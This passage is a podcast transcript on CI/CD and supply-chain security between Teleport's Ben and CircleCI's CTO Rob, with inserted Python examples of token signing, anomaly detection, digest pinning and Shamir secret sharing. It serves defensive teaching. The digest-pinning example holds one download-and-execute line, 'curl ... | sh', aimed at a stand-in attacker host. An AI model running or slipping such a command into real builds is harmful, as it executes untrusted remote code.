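def issue_token(key, subject, ttl_seconds, now=None):
    """Sign 'subject|expiry' with the current key and return a token string."""
    current = time.time() if now is None else now
    payload = f"{subject}|{int(current + ttl_seconds)}".encode()
    sig = hmac.new(key, payload, hashlib.sha256).digest()
    return (base64.urlsafe_b64encode(payload).decode()
            + "." + base64.urlsafe_b64encode(sig).decode())


def verify_token(key, token, now=None):
    """Return the subject if the token is authentic and unexpired, else None."""
    try:
        payload_b64, sig_b64 = token.split(".")
        payload = base64.urlsafe_b64decode(payload_b64)
        sig = base64.urlsafe_b64decode(sig_b64)
    except ValueError:  # malformed token or bad base64
        return None
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        return None  # signed with a different (for example, rotated) key
    subject, _, expires = payload.decode().rpartition("|")
    current = time.time() if now is None else now
    return subject if current < int(expires) else None


old_key, new_key = b"signing-key-v1", b"signing-key-v2"
token = issue_token(old_key, "deploy-job", ttl_seconds=60, now=1000)
print(verify_token(old_key, token, now=1030))  # deploy-job
print(verify_token(old_key, token, now=1060))  # None (expired)
print(verify_token(new_key, token, now=1030))  # None (key rotated)
```

The two `None` results are the point of the design: a leaked token stops working on its own after a minute, and rotating the signing key invalidates every outstanding token in one step.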
Ben: 00:31:18.492 Yeah. One thing we notice at Teleport, which provides sort of access to people's infrastructure, is that there's also auditing around sort of people accessing machines. But developers are pretty savvy. So if they want to go around it, they can just go upload a script, and then do whatever they want to do. You could deploy a script and do damage. Sort of going back to some of the other questions, how important is it to know what's happening machine to machine, and how do you sort of instrument what is happening in those systems?
Rob: 00:31:49.253 Similarly to something we were talking about before, the reality is we pay a lot of attention to humans, but don't necessarily have the view that we think we have. I guess that's probably the place that I would land on that is we think we have really good understanding of what everyone's doing, but most attacks have demonstrated that we don't. Right? Like someone was in the system somewhere and we found that out later. So how important is it to understand what machines are doing amongst each other, what's being run on a system? I think it's critical. I mean, anything that doesn't look normal is something that you would want to know about, or doesn't look expected, I guess, is the best way to describe that. Whether it's network access between machines, whether it's just volume of data moving between machines. I mean, for us, that could be one of two things, like just the system is behaving poorly or someone's driving the system to do something unexpected. But both of those are interesting.
Rob: 00:32:50.220 So I should be looking for outliers in terms of anomalous behavior, whether it's, again, network traffic over a particular port that I wasn't expecting or volume of traffic moving across something, whether it's high or whether it's low. That tells me that something is different in the system. And again, it might just be something's not behaving correctly, and that might be impacting our customers. So, of course, I want to know about that right away. Or it might be, as you said, someone's executing a script that's doing something unanticipated like collecting a bunch of data back down to a machine or something like that. If it's something that's impacting our customers, I care about that. If it's not, then there's probably something else that I want to know. And so anything that I can understand about that, which it might come from, again, logging network access, logging anything that's happening in the machine, basics like — I love that every time I use sudo, it tells me that this event is going to be logged, and it's on my laptop, and I sort of have a laugh about it.
Rob: 00:33:48.794 But in a production environment, I actually want to know about that. I want to know who logged into the system, why they were escalating their privileges, what was happening in that environment. So I think it's probably hard to say in advance, oh, if this thing occurs, that means there's a security problem. Right? It's a little bit like the problem, again, of just production systems. I don't know what's going to be different, but I want to know if something is different and have the tools to be able to say, "Oh, it was this person who did this thing," as basics. Why people have individual accounts on systems instead of everyone having a shared account in a production system. Right? I want to know who got onto the system, were they authorized to get there. I want to be able to pull people's access as soon as they leave the company, for example. These are basics, but not everyone follows them. It's like, "Oh, we'll just have a shared machine user, and we'll use that." Now when someone leaves, we have to rotate the key for everybody. And to the previous point of rotating keys, everyone's like, "I don't even know where that is. I don't know how to change it. Oh, that'll break this person's workflow. This other automated tool will break." So separate your automated systems from your people and then pay attention to what's happening. Of course, it happens in massive volume, so have tools, right, to look at logs to identify things that are happening that look like patterns that are out of the ordinary. But absolutely, anything that's an outlier, I want to know about.
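Rob's point about watching for traffic volume that is unexpectedly high or low can be sketched with a simple outlier check. The Python below uses the modified z-score (median and median absolute deviation, with the commonly cited constant 0.6745 and cutoff 3.5). The function name `find_outliers` and the sample numbers are invented for illustration, and production anomaly detection would need to handle trends and seasonality that this ignores.

```python
import statistics


def find_outliers(samples, threshold=3.5):
    """Return indices of samples whose modified z-score exceeds the threshold.

    The median and the median absolute deviation (MAD) are used instead of
    the mean and standard deviation so that one huge spike does not hide
    the other anomalies.
    """
    median = statistics.median(samples)
    mad = statistics.median(abs(x - median) for x in samples)
    if mad == 0:
        # Every typical sample is identical; anything different stands out.
        return [i for i, x in enumerate(samples) if x != median]
    return [
        i for i, x in enumerate(samples)
        if abs(0.6745 * (x - median) / mad) > threshold
    ]


# Hypothetical megabytes per minute between two machines.
traffic = [100, 104, 98, 101, 99, 103, 950, 102, 97, 5]
print(find_outliers(traffic))  # [6, 9]
```

Both the spike (950) and the drop (5) are flagged, which matches the framing in the conversation: the check does not say whether the cause is an attacker or a misbehaving service, only that something is different and worth looking at.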
Integrity of build infrastructure and vendoring libraries
Ben: 00:35:06.610 Going back a bit more to, I guess, the CI/CD, we talked a little bit about checking the integrity of build infrastructure, we talked a little bit about build artifacts, and then also vendoring libraries. I guess Golang makes it pretty easy to vendor your libraries. But do you have any sort of thoughts on these two topics?
Rob: 00:35:25.160 Yeah. I mean, I think that it's validation. Right? How do I build trust for the things that I'm pulling in? And there are some default tools, but there's probably lots of gaps in the ecosystem. And I think it's a place that we can help as a provider. But at some point, our customers have access to the shell. We can try to help them by pointing towards good tools and practices, but if you choose to execute something within your build environment that you haven't checked and is totally uncontrolled, I think the advent of downloading a shell script and piping it to sudo as a quick tool to get something done is one of the most disappointing things that's happened in software development in the last 10 or 20 years. And so at some point, we can't stop people from doing things like that; we can just try to educate. And I think there's places in the ecosystem for sure, like how package managers work is a great opportunity to say, "Okay. We're going to get this version of this library, but we're going to use the following tools to make sure that it's known to be good." And I think, yeah, I keep talking about signatures. It doesn't have to be that hard, but you have to do it.
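One small step away from downloading a script and running it unchecked is to pin a digest and verify it before anything executes. The Python sketch below shows that check with SHA-256. It is a simpler stand-in for the signatures Rob mentions, not a replacement for them, and the script contents, the name `verify_sha256`, and the way the pinned digest is obtained are all assumptions for the example. In practice the pinned value would come from a trusted channel and be committed alongside the build configuration.

```python
import hashlib
import hmac


def verify_sha256(data, expected_hex):
    """Return True only if the SHA-256 digest of data matches the pinned value."""
    actual = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(actual, expected_hex.lower())


# Stand-in for an installer fetched during a build.
script = b"#!/bin/sh\necho installing tool\n"

# Computed here only so the example is self-contained; normally this is a
# constant recorded when the script was reviewed.
pinned_digest = hashlib.sha256(script).hexdigest()

tampered = script + b"curl https://attacker.invalid/x | sh\n"

print(verify_sha256(script, pinned_digest))    # True
print(verify_sha256(tampered, pinned_digest))  # False
```

A build step would refuse to execute the download when the function returns `False`, so a change upstream becomes a visible failure instead of silently running new code.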
Ben: 00:36:33.544 Yeah. I guess the script is an example. It's one step or four steps. Take time to automate the four steps into one step to make your life easier.
Rob: 00:36:41.684 Right. Exactly. And I think that it's solvable. It's all solvable. Well, the basics are solvable. Right? And then it's, what's going to happen next? So then I think the other perspective that I'm always interested in, and, I mean, I don't have a canned solution, but I think we all need to think about it, is if we assume that there's always another vector and that someone is able to do something malicious in this environment, how do we make it so that doesn't matter? And I think it's a great framing, at least, to take a different perspective or different angle and say, "Okay. We can make it so that it just doesn't matter if there's activity in this environment," or "There's always another level of check sort of thing that past this system is going to prevent this thing from perpetuating."
Ben: 00:37:27.716 Yeah. It's kind of like a smoke test or something.
Rob: 00:37:30.350 Yeah. I think going back to SolarWinds and some of these other cases, it's not that one piece of software was infiltrated, it's that it was then distributed kind of everywhere. The reach was so great. And so what's the check at that next stop that says, "Oh, okay. Yeah. Even if that happened, it wouldn't get outside of this box."?
Improvements in notarization and final distribution of on-prem package software
Ben: 00:37:51.239 Yeah. I think the one interesting thing, so we have our software go on-prem, and we've notarized both our Mac and Windows binaries. And the one interesting thing, kind of hilarious, I've found, if you pay Microsoft $1,000 a year, your code signing dongle automatically passes Windows Defender, and so it doesn't have any other checks. If you pay $100, it goes through some sort of AI to figure out whether it's a trustworthy binary or not, doesn't show you an alert. But if you need the code signing dongle, it also requires a hardware token. So automation is kind of difficult in a cloudy world. So it needs to be on someone's machine, which is also a bad practice if you don't have AWS. Have you seen any improvements in this space around sort of notarization and that final distribution of sort of on-prem package software?
Rob: 00:38:36.944 I mean, it's not something that we deal with a ton other than — you talked in the intro about the mobile days, right? And a big part of mobile deployment is typically signing software for that purpose. I'll say one of the reasons that we were able to win customers as a mobile CI/CD platform was that automating that process was really, really hard and we had to jump through a bunch of hoops to make it work. So I wouldn't say that I've necessarily seen improvements. I think you're identifying the key tradeoff, which is, how confident am I that no one's been in this environment and able to manipulate it versus how can I do it in a way that I can get the job done and I don't introduce these other risks? Right? Knowing that this one trusted person was the person who did this thing is probably great from a security perspective, although no one can truly be trusted on their own. On the other hand, only having one person who could ship the software is everybody's nightmare. It's the thing that we're saying constantly, "Automate it so anyone can press the button," sort of thing. Right? So one of the tools that we use just within our own platform is this concept of restricted context. Basically, there are certain steps that someone needs to show up and validate and say, "Okay. I approve this to go through the next stage," and then they have escalated privileges for that particular step. And so I think there's some opportunities to make those things mostly work, but still be secure. And then you could have maybe a group of people who can do that. But I think that that trade-off is tricky, and I think that, "We'll just tie it to your hardware dongle," is not a good one for large-scale organizations. You have this one magic hardware key — is a difficult thing to scale, for sure.
Ben: 00:40:21.391 Yeah. So sort of taking the concept of a pull request, where approval requires multiple people to approve it to make it go through, sort of the two- or four-person rule.
Rob: 00:40:32.017 Yeah. I think multiple people. I mentioned Vault earlier, and I forget the name of the algorithm, but there's sort of this access to unlock, it requires multiple different keys. And it can be a few of a group of keys, which is a cool concept that I guess I learned from that product. But saying, "Okay. I need two of three signatures or three of five," or something like that is a powerful model for something that really needs that level. And then you have to ask the question, what's my exposure here versus here? How often am I going to use that set of tools? Because it is going to create overhead at some point. At some point, I'm trying to ship software, and the footprint or risk of that particular piece of software might be quite low. I don't need to pull all the tricks out of the bag for that one. But this thing over here — I'm trying to think of an example, but it might be your payment system versus something else within your platform. Right? Like who has access to the bank account? Very important. Who has access to our customers' source code as a CI and CD provider? Very important. But there are definitely other pieces of the platform that can be isolated. And so that's an interesting question as well, like, can you isolate these systems even from each other such that you can reduce even the number of places where the exposure is high?
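The "two of three" or "three of five" model Rob describes is most likely Shamir's Secret Sharing, which Vault documents for splitting its unseal key. The Python below is a minimal teaching sketch of that scheme over a prime field, not Vault's implementation. The names `split_secret` and `recover_secret`, the choice of prime, and the example secret are assumptions, and real deployments should rely on a reviewed library.

```python
import secrets

# 2**127 - 1 is a Mersenne prime; secrets must be integers below it.
PRIME = 2**127 - 1


def split_secret(secret, threshold, shares):
    """Split secret into `shares` points; any `threshold` of them recover it."""
    if not 0 <= secret < PRIME:
        raise ValueError("secret out of range")
    if not 1 <= threshold <= shares:
        raise ValueError("need 1 <= threshold <= shares")
    # Random polynomial of degree threshold-1 whose constant term is the secret.
    coeffs = [secret] + [secrets.randbelow(PRIME) for _ in range(threshold - 1)]

    def evaluate(x):
        acc = 0
        for c in reversed(coeffs):  # Horner's rule
            acc = (acc * x + c) % PRIME
        return acc

    return [(x, evaluate(x)) for x in range(1, shares + 1)]


def recover_secret(points):
    """Lagrange-interpolate the polynomial at x = 0 to get the secret back."""
    total = 0
    for i, (xi, yi) in enumerate(points):
        num, den = 1, 1
        for j, (xj, _) in enumerate(points):
            if i != j:
                num = (num * -xj) % PRIME
                den = (den * (xi - xj)) % PRIME
        # Modular inverse via Fermat's little theorem (PRIME is prime).
        total = (total + yi * num * pow(den, PRIME - 2, PRIME)) % PRIME
    return total


key_shares = split_secret(123456789, threshold=3, shares=5)
print(recover_secret(key_shares[:3]))                                  # 123456789
print(recover_secret([key_shares[0], key_shares[2], key_shares[4]]))  # 123456789
```

Any three of the five shares reconstruct the value, while fewer than three reveal nothing useful about it. That is what lets an organization require a quorum for its most sensitive operations without depending on a single person or a single hardware key.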
Types of attacks witnessed on the CI/CD platform
Ben: 00:41:49.160 Yeah. And so as an operator of a CI/CD platform, I guess you have to be a target for hackers. I've always found hackers to get creative when they have a few hours of free compute. Apart from just people running crypto miners, what sort of other attacks do you see on your platform?
Rob: 00:42:03.151 We're sort of remote code execution as a service. Right? I mean, you have arbitrary compute that we allow you to run on. And for certain levels of accounts, you can use our compute for free. I would say crypto mining is a real thing. We've seen that a lot in the industry where folks are even turning off their free offerings because it's so rampant. We've chosen to battle that to continue to give our customers the opportunity to use the platform at what we think is the right value. We're willing to take that on as a burden and have been pretty effective, I think, in shutting it down. So that's probably the big one. Beyond that, just the access to compute is not necessarily particularly valuable to folks because we have fairly limited compute compared to what you can get from other places, I would say. We've seen things like people try to launch DDoS out of one of our VMs, but it's a joke. It doesn't get very far. It gets shut off immediately. They're wasting their time. So it doesn't happen very often.
Rob: 00:43:00.233 The thing that I think is really interesting about attacks of any kind — I worked in email for years and so spam was the thing that we paid a lot of attention to — is ultimately it's an economic question. Right? How much work do I have to put into this and what am I going to get for it? And I remember thinking, "Who even reads these ridiculous emails?" But they wouldn't be sending them year after year if people weren't giving them their bank account numbers or their social security numbers or whatever it is they email asking for. It clearly works, right? So the crypto mining keeps coming up in sort of flares, let's say, and we put it out. And so it kind of comes in waves, but there's still energy going into it, so someone's getting something. The DDoS thing shows up once a year, and then whoever's trying to do it is like, "Well, this wasn't worth my energy," because it doesn't actually do anything. Right? They're trying to use our machines basically as bot machines. It just doesn't work. And so they stopped because they didn't get the return they were trying to get, the investment is high. And so we actually don't see a huge surface of attacks, again, of just using the compute to try to do something else because it's a very constrained system. It's designed for a specific purpose. It's really great for that; not great for sort of arbitrary consumption for other reasons. And so, yeah, pretty limited.
Isolating customer environments
Ben: 00:44:18.272 And then you talked a little about sort of the importance of isolating your customer environments. Can you talk about why that's such an important thing at CircleCI?
Rob: 00:44:25.723 Yeah. I mean, that's real. We have a multitenant environment where customers are running their builds amongst a very large cluster of machines that we operate. And so ensuring that they are isolated from each other. In some places it's a VM, in some places it's containerized and those containers are operating across the machines. So we have multiple layers of isolation from system level calls to what kind of access do you have to how network bridges are built, etc., etc. to ensure that the systems are completely isolated from each other. And so, yes, people are building code. That's the happy path. Going back to my previous statement where you basically have this completely isolated piece of machine on the internet, you're limited in what you can do with that. If all of that was running, all our customers were basically on the same machine and had visibility into everyone else, you could imagine that the opportunities for attacks would be very, very different. And so, yeah, we invest a lot of energy in isolation and making sure that these things are independent from each other.
The non-engineering challenges
Ben: 00:45:33.031 Yeah. And I guess my last question, sort of as CTO — we've sort of talked about some sort of engineering challenges, but I think when we previously talked, a lot of these are also challenges with the organization, the team, and the processes. Can you talk about how you view sort of your team and processes to help solve some of the problems we've discussed?
Rob: 00:45:50.670 Yeah. I mean, I think there's a couple of layers there. First, everyone building software needs to have some fundamental understanding or context around security principles. We spend time talking about what we're building at a high level so people have a concept of where they might be playing into that, the kinds of things that they do. We also invest in — I want to call it training, but we've taken a pretty particular approach of we sort of use capture the flag type exercises and more engineering-oriented like, "This is what it looks like when you actually break into a system," versus, "Here's a presentation about systems," because we feel like that gets people even just a better connection, right, in terms of, "Oh, day-to-day, this is the thing I'm doing." So is that perfect? No. Yeah. As I said, third-party pen testing and stuff like that, but trying to invest in giving people a perspective of how security functions in the world that we're operating in. So I think all of that is important.
Rob: 00:46:47.009 I think the second thing from a human element is so many opportunities — opportunity feels like a bad word. But so many opportunities as an attacker are exposed through the human piece of the puzzle. I mean, there's a reason we all get phishing emails. Right? Again, there's a return on that investment because it works. Right? People want to be helpful. They happily provide information, those sorts of things. And so understanding that no matter how strong your systems are, how well designed your software is, there are pathways for people to perform actions, and you have to think about the human element of your environment. Right? And so this comes back to the multi-key thing as an example, where just at the end of the day, it's always possible for a person to be "compromised", and I'm air quoting, which no one can see. But there are reasons that people will behave in ways that you didn't expect. Right? And I'm not going to spend hours talking about what those might be.
Rob: 00:47:49.643 But just accepting, hey, you know what? This is an important thing. Let's make it require — we talked about multiple sign-offs on a PR. If I can just ship any code into the environment, then we as a business are exposed. So let's make sure that a second person has looked at it. Right? Just give it a reason to have a second look. And there are lots of places where that could be the case. So I think two elements to the human dynamic there. One, making sure people have the context to think about this. As someone who gets to spend a lot of their time looking at the bigger picture, I am well aware of how security plays into our environment, but not every engineer on the entire team is thinking about this stuff all day long. So how do we make sure they have a bit of that context? And then just thinking about humans as a vector, I guess is the right word. Right? So many exploits start with people.
A practical tip to apply to your CI/CD system today
Ben: 00:48:39.292 Great. I think that's a good place to end. It's been fun. I've learnt a lot. Just to close things out, do you have one practical tip that people could apply to their CI/CD systems today?
Rob: 00:48:50.449 Just one?
Ben: 00:48:51.322 Just one.
Rob: 00:48:52.241 Reduce your build time. Let's just start there. If you want to be able to mitigate issues, make sure that you can deliver confidently at any given time and that it's fast. That will fix far more than just your security.
Ben: 00:49:03.108 Awesome. Thanks, Rob.
Rob: 00:49:04.109 Thanks, Ben. It's been great.
Ben: 00:49:05.535 [music] This podcast is brought to you by Teleport. Teleport is the easiest, most secure way to access all your infrastructure. The open-source Teleport Access Plane consolidates connectivity, authentication, authorization, and auditing into a single platform. By consolidating all aspects of infrastructure access, Teleport reduces the attack surface area, cuts operational overhead, easily enforces compliance, and improves engineering productivity. Learn more at goteleport.com or find us on GitHub, github.com/gravitational/teleport.